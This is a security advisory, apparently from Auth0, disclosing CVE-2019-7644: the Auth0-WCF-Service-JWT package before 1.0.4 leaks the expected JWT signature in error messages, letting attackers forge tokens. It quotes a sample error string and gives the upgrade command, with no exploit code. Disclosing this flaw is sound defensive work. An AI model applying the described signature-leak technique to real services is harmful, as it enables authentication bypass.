> ## Documentation Index > Fetch the complete documentation index at: https://auth0.com/llms.txt > Use this file to discover all available pages before exploring further. > CVE-2019-7644: Security vulnerability in Auth0-WCF-Service-JWT for ASP.NET # CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT **Published**: February 15, 2019 **CVE number**: CVE-2019-7644 **Credit**: Conny Dahlgren, Security Researcher at DevilSec AB ## Overview All versions of [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) NuGet package lower than 1.0.4 include sensitive information about the expected JWT signature in an error message emitted when JWT signature validation fails: `Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=` This vulnerability allows attackers to use this error message to obtain a valid signature for arbitrary JWT tokens. This way attackers can forge tokens to bypass authentication and authorization mechanisms. ## Am I affected? You are affected by this vulnerability if the following conditions apply: * You use a version of [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) NuGet package lower than 1.0.4 * You show signature verification exception message in the user interface or make it otherwise available to the attacker (for example through logs or diagnostic messages) ## How to fix that? Developers using the [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) library need to upgrade to the latest version 1.0.4. The updated package is available on [NuGet](https://www.nuget.org): `Install-Package Auth0-WCF-Service-JWT -Version 1.0.4` ### Will this update impact my users? No. This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.